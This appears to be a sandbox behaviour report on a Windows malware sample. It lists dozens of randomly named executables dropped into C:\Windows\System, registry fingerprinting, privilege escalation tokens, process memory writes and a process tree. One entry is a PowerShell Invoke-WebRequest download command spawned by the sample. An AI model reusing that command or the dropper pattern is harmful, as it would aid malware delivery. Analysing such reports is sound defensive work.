File created C:\Windows\System\fScRBnS.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\YlzOICq.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\uHsSEOn.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\BMtBfIY.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\ZoVJqgm.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\qTIaoZj.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\LuaDESU.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\ZtpwyEb.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\rMYcFIa.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\uyGYOdC.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\YidDOEI.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\ugcDTrj.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\NpdbiHN.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\ESBsgpZ.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\pSZfzot.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\DglUnjA.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\JSLxhPN.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\zHYbOCd.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\LbQasdY.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\zLYYuOo.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\VaTdxAp.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\WiOPHTo.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\VzXdFKN.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\xMDPAYk.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\xfbeuxq.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\ApgJGTm.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\XZnmBVL.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\vuFajSx.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\GwjUewV.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\hMcDLbW.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\uRgOpcZ.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\cpboGHt.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\cJcigMr.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\LUnFgqm.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\hqZXvNK.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\JFNFIgR.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
File created C:\Windows\System\pdmWpJg.exe C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wermgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\wermgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4284 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\nOsvlVs.exe
PID 4284 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\nOsvlVs.exe
PID 4284 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\bxZMfjj.exe
PID 4284 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\bxZMfjj.exe
PID 4284 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\vNBRRlO.exe
PID 4284 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\vNBRRlO.exe
PID 4284 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\YCwTtxy.exe
PID 4284 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\YCwTtxy.exe
PID 4284 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\Yalmwld.exe
PID 4284 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\Yalmwld.exe
PID 4284 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\zSrTtJg.exe
PID 4284 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\zSrTtJg.exe
PID 4284 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\ntJieYF.exe
PID 4284 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\ntJieYF.exe
PID 4284 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\HaRQnqU.exe
PID 4284 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\HaRQnqU.exe
PID 4284 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\SHVfHig.exe
PID 4284 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\SHVfHig.exe
PID 4284 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\JYLBnFO.exe
PID 4284 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\JYLBnFO.exe
PID 4284 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\vqcCkIs.exe
PID 4284 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\vqcCkIs.exe
PID 4284 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\kVCpWCY.exe
PID 4284 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\kVCpWCY.exe
PID 4284 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\zJnHgwu.exe
PID 4284 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\zJnHgwu.exe
PID 4284 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\ChkBlmA.exe
PID 4284 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\ChkBlmA.exe
PID 4284 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\kMwODTH.exe
PID 4284 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\kMwODTH.exe
PID 4284 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\oAdYkgz.exe
PID 4284 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\oAdYkgz.exe
PID 4284 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\mRrzciG.exe
PID 4284 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\mRrzciG.exe
PID 4284 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\CZYxexW.exe
PID 4284 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\CZYxexW.exe
PID 4284 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\mfdUQZU.exe
PID 4284 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\mfdUQZU.exe
PID 4284 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\VquUxub.exe
PID 4284 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\VquUxub.exe
PID 4284 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\NpdbiHN.exe
PID 4284 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\NpdbiHN.exe
PID 4284 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\oOSYaGq.exe
PID 4284 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\oOSYaGq.exe
PID 4284 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\oSkTxCx.exe
PID 4284 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\oSkTxCx.exe
PID 4284 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\fXgqxZo.exe
PID 4284 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\fXgqxZo.exe
PID 4284 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\YlgZnbZ.exe
PID 4284 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\YlgZnbZ.exe
PID 4284 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\tMNoHOf.exe
PID 4284 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\tMNoHOf.exe
PID 4284 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\wlydLxw.exe
PID 4284 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\wlydLxw.exe
PID 4284 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\rygAwMO.exe
PID 4284 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\rygAwMO.exe
PID 4284 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\JJvJMQL.exe
PID 4284 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\JJvJMQL.exe
PID 4284 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\hJsiyRl.exe
PID 4284 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\hJsiyRl.exe
PID 4284 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\ANOQTHx.exe
PID 4284 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe C:\Windows\System\ANOQTHx.exe

Processes

C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\78371ae98fcb173894987ffaf3bd9231_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\nOsvlVs.exe

C:\Windows\System\nOsvlVs.exe

C:\Windows\System\bxZMfjj.exe

C:\Windows\System\bxZMfjj.exe

C:\Windows\System\vNBRRlO.exe

C:\Windows\System\vNBRRlO.exe

C:\Windows\System\YCwTtxy.exe

C:\Windows\System\YCwTtxy.exe

C:\Windows\System\Yalmwld.exe

C:\Windows\System\Yalmwld.exe

C:\Windows\System\zSrTtJg.exe

C:\Windows\System\zSrTtJg.exe

C:\Windows\System\ntJieYF.exe

C:\Windows\System\ntJieYF.exe

C:\Windows\System\HaRQnqU.exe

C:\Windows\System\HaRQnqU.exe

C:\Windows\System\SHVfHig.exe

C:\Windows\System\SHVfHig.exe

C:\Windows\System\JYLBnFO.exe

C:\Windows\System\JYLBnFO.exe

C:\Windows\System\vqcCkIs.exe

C:\Windows\System\vqcCkIs.exe

C:\Windows\System\kVCpWCY.exe

C:\Windows\System\kVCpWCY.exe

C:\Windows\System\zJnHgwu.exe

C:\Windows\System\zJnHgwu.exe

C:\Windows\System\ChkBlmA.exe

C:\Windows\System\ChkBlmA.exe

C:\Windows\System\kMwODTH.exe

C:\Windows\System\kMwODTH.exe

C:\Windows\System\oAdYkgz.exe

C:\Windows\System\oAdYkgz.exe

C:\Windows\System\mRrzciG.exe

C:\Windows\System\mRrzciG.exe

C:\Windows\System\CZYxexW.exe

C:\Windows\System\CZYxexW.exe

C:\Windows\System\mfdUQZU.exe

C:\Windows\System\mfdUQZU.exe

C:\Windows\System\VquUxub.exe

C:\Windows\System\VquUxub.exe

C:\Windows\System\NpdbiHN.exe

C:\Windows\System\NpdbiHN.exe

C:\Windows\System\oOSYaGq.exe

C:\Windows\System\oOSYaGq.exe

C:\Windows\System\oSkTxCx.exe

C:\Windows\System\oSkTxCx.exe

C:\Windows\System\fXgqxZo.exe

C:\Windows\System\fXgqxZo.exe

C:\Windows\System\YlgZnbZ.exe

C:\Windows\System\YlgZnbZ.exe

C:\Windows\System\tMNoHOf.exe

C:\Windows\System\tMNoHOf.exe

C:\Windows\System\wlydLxw.exe

C:\Windows\System\wlydLxw.exe

C:\Windows\System\rygAwMO.exe

C:\Windows\System\rygAwMO.exe

C:\Windows\System\JJvJMQL.exe

C:\Windows\System\JJvJMQL.exe

C:\Windows\System\hJsiyRl.exe

C:\Windows\System\hJsiyRl.exe

C:\Windows\System\ANOQTHx.exe

C:\Windows\System\ANOQTHx.exe

C:\Windows\System\WJBitpO.exe

C:\Windows\System\WJBitpO.exe

C:\Windows\System\QbbSmaB.exe

C:\Windows\System\QbbSmaB.exe

C:\Windows\System\GInmdqu.exe

C:\Windows\System\GInmdqu.exe

C:\Windows\System\AkynjzP.exe

C:\Windows\System\AkynjzP.exe

C:\Windows\System\uHsSEOn.exe

C:\Windows\System\uHsSEOn.exe

C:\Windows\System\VUnVHJM.exe

C:\Windows\System\VUnVHJM.exe

C:\Windows\System\ifSeOKP.exe

C:\Windows\System\ifSeOKP.exe

C:\Windows\System\eeyMbjT.exe

C:\Windows\System\eeyMbjT.exe

C:\Windows\System\SgbPnqB.exe

C:\Windows\System\SgbPnqB.exe

C:\Windows\System\xpfHLTS.exe

C:\Windows\System\xpfHLTS.exe

C:\Windows\System\ODqyKus.exe

C:\Windows\System\ODqyKus.exe

C:\Windows\System\yBvhuPm.exe

C:\Windows\System\yBvhuPm.exe

C:\Windows\System\JkTorYA.exe

C:\Windows\System\JkTorYA.exe

C:\Windows\System\rycBghn.exe

C:\Windows\System\rycBghn.exe

C:\Windows\System\JiIkPyl.exe

C:\Windows\System\JiIkPyl.exe

C:\Windows\System\wguwRVB.exe

C:\Windows\System\wguwRVB.exe

C:\Windows\System\znjoKGf.exe

C:\Windows\System\znjoKGf.exe

C:\Windows\System\OkHEgHv.exe

C:\Windows\System\OkHEgHv.exe

C:\Windows\System\zseybzj.exe

C:\Windows\System\zseybzj.exe

C:\Windows\System\fzElKiM.exe

C:\Windows\System\fzElKiM.exe

C:\Windows\System\ihkSjAG.exe

C:\Windows\System\ihkSjAG.exe

C:\Windows\System\aSFoNtU.exe

C:\Windows\System\aSFoNtU.exe

C:\Windows\System\GwjUewV.exe

C:\Windows\System\GwjUewV.exe

C:\Windows\System\QVyEfaL.exe

C:\Windows\System\QVyEfaL.exe

C:\Windows\System\xMDPAYk.exe

C:\Windows\System\xMDPAYk.exe

C:\Windows\System\rCBWeGI.exe

C:\Windows\System\rCBWeGI.exe

C:\Windows\System\GRYGpwM.exe

C:\Windows\System\GRYGpwM.exe

C:\Windows\System\buaycCV.exe

C:\Windows\System\buaycCV.exe

C:\Windows\System\yQEDwsT.exe

C:\Windows\System\yQEDwsT.exe

C:\Windows\System\XCpJzcX.exe

C:\Windows\System\XCpJzcX.exe

C:\Windows\System\dTgcBul.exe

C:\Windows\System\dTgcBul.exe

C:\Windows\System\GpezMUy.exe

C:\Windows\System\GpezMUy.exe

C:\Windows\System\tMxAcKa.exe

C:\Windows\System\tMxAcKa.exe

C:\Windows\System\qPmNWkX.exe

C:\Windows\System\qPmNWkX.exe

C:\Windows\System\aEDrTsr.exe

C:\Windows\System\aEDrTsr.exe

C:\Windows\System\cQAkjLa.exe

C:\Windows\System\cQAkjLa.exe

C:\Windows\System\GTRmUQr.exe

C:\Windows\System\GTRmUQr.exe

C:\Windows\System\AZDREDZ.exe

C:\Windows\System\AZDREDZ.exe

C:\Windows\System\XOOdiok.exe

C:\Windows\System\XOOdiok.exe

C:\Windows\System\utbqNef.exe

C:\Windows\System\utbqNef.exe

C:\Windows\System\SBhCsTn.exe

C:\Windows\System\SBhCsTn.exe

C:\Windows\System\guzBXJq.exe

C:\Windows\System\guzBXJq.exe

C:\Windows\System\mTneSWZ.exe

C:\Windows\System\mTneSWZ.exe

C:\Windows\System\PgLCilp.exe

C:\Windows\System\PgLCilp.exe

C:\Windows\System\GQEDtNx.exe

C:\Windows\System\GQEDtNx.exe

C:\Windows\System\FbgtXJq.exe

C:\Windows\System\FbgtXJq.exe

C:\Windows\System\jqadgdY.exe

C:\Windows\System\jqadgdY.exe

C:\Windows\System\nYEYPFV.exe

C:\Windows\System\nYEYPFV.exe

C:\Windows\System\hBnkXSi.exe

C:\Windows\System\hBnkXSi.exe

C:\Windows\System\dCnfASw.exe

C:\Windows\System\dCnfASw.exe

C:\Windows\System\ZBIASCE.exe

C:\Windows\System\ZBIASCE.exe

C:\Windows\System\ESBsgpZ.exe

C:\Windows\System\ESBsgpZ.exe

C:\Windows\System\gtmORwo.exe

C:\Windows\System\gtmORwo.exe

C:\Windows\System\rdEpEMG.exe

C:\Windows\System\rdEpEMG.exe

C:\Windows\System\viETbnY.exe

C:\Windows\System\viETbnY.exe

C:\Windows\System\vTFZxvn.exe

C:\Windows\System\vTFZxvn.exe

C:\Windows\System\VfbICie.exe

C:\Windows\System\VfbICie.exe

C:\Windows\System\SpRiTND.exe

C:\Windows\System\SpRiTND.exe

C:\Windows\System\jOMSmoW.exe

C:\Windows\System\jOMSmoW.exe

C:\Windows\System\RWYOiwm.exe

C:\Windows\System\RWYOiwm.exe

C:\Windows\System\NhVEjym.exe

C:\Windows\System\NhVEjym.exe

C:\Windows\System\OlifCZL.exe

C:\Windows\System\OlifCZL.exe

C:\Windows\System\qCVeVyZ.exe

C:\Windows\System\qCVeVyZ.exe

C:\Windows\System\KwXbfOd.exe

C:\Windows\System\KwXbfOd.exe

C:\Windows\System\BrxpACT.exe

C:\Windows\System\BrxpACT.exe

C:\Windows\System\LlLVYWo.exe

C:\Windows\System\LlLVYWo.exe

C:\Windows\System\xdgMrZF.exe

C:\Windows\System\xdgMrZF.exe

C:\Windows\System\GswQHzP.exe

C:\Windows\System\GswQHzP.exe

C:\Windows\System\saXpziA.exe

C:\Windows\System\saXpziA.exe

C:\Windows\System\jWHjmEW.exe

C:\Windows\System\jWHjmEW.exe

C:\Windows\System\WEoYsve.exe

C:\Windows\System\WEoYsve.exe

C:\Windows\System\ypMjxGP.exe

C:\Windows\System\ypMjxGP.exe

C:\Windows\System\WlzqGBF.exe

C:\Windows\System\WlzqGBF.exe

C:\Windows\System\pmWtVdt.exe

C:\Windows\System\pmWtVdt.exe

C:\Windows\System\imOjlPe.exe

C:\Windows\System\imOjlPe.exe

C:\Windows\System\WPwtkWF.exe

C:\Windows\System\WPwtkWF.exe

C:\Windows\System\wJpuguC.exe

C:\Windows\System\wJpuguC.exe

C:\Windows\System\CFYJBsw.exe

C:\Windows\System\CFYJBsw.exe

C:\Windows\System\sxOwVVz.exe

C:\Windows\System\sxOwVVz.exe

C:\Windows\System\vIkbiEa.exe

C:\Windows\System\vIkbiEa.exe

C:\Windows\System\KwKtEVd.exe

C:\Windows\System\KwKtEVd.exe

C:\Windows\System\kNWgBUl.exe

C:\Windows\System\kNWgBUl.exe

C:\Windows\System\nqlvlGN.exe

C:\Windows\System\nqlvlGN.exe

C:\Windows\System\SnXcsxx.exe

C:\Windows\System\SnXcsxx.exe

C:\Windows\System\JZHIIIP.exe

C:\Windows\System\JZHIIIP.exe

C:\Windows\System\vlmWLDw.exe

C:\Windows\System\vlmWLDw.exe

C:\Windows\System\wQTAIae.exe

C:\Windows\System\wQTAIae.exe

C:\Windows\System\YcjddjK.exe

C:\Windows\System\YcjddjK.exe

C:\Windows\System\MndPzkb.exe

C:\Windows\System\MndPzkb.exe

C:\Windows\System\SMOWFfO.exe

C:\Windows\System\SMOWFfO.exe

C:\Windows\System\urpoEbC.exe

C:\Windows\System\urpoEbC.exe

C:\Windows\System\TvuvXqp.exe

C:\Windows\System\TvuvXqp.exe

C:\Windows\System\yaBzmqZ.exe

C:\Windows\System\yaBzmqZ.exe

C:\Windows\System\eTvSHIr.exe

C:\Windows\System\eTvSHIr.exe

C:\Windows\System\jbafjnm.exe

C:\Windows\System\jbafjnm.exe

C:\Windows\System\MZKcMZG.exe

C:\Windows\System\MZKcMZG.exe

C:\Windows\System\vWCMVEy.exe

C:\Windows\System\vWCMVEy.exe

C:\Windows\System\CydZYdS.exe

C:\Windows\System\CydZYdS.exe

C:\Windows\System\XOPHKqS.exe

C:\Windows\System\XOPHKqS.exe

C:\Windows\System\iNiXRHm.exe

C:\Windows\System\iNiXRHm.exe

C:\Windows\System\UySmhlC.exe

C:\Windows\System\UySmhlC.exe

C:\Windows\System\pbTDzKN.exe

C:\Windows\System\pbTDzKN.exe

C:\Windows\System\KgqERfm.exe

C:\Windows\System\KgqERfm.exe

C:\Windows\System\YOJImIr.exe

C:\Windows\System\YOJImIr.exe

C:\Windows\System\mfdvZsf.exe

C:\Windows\System\mfdvZsf.exe

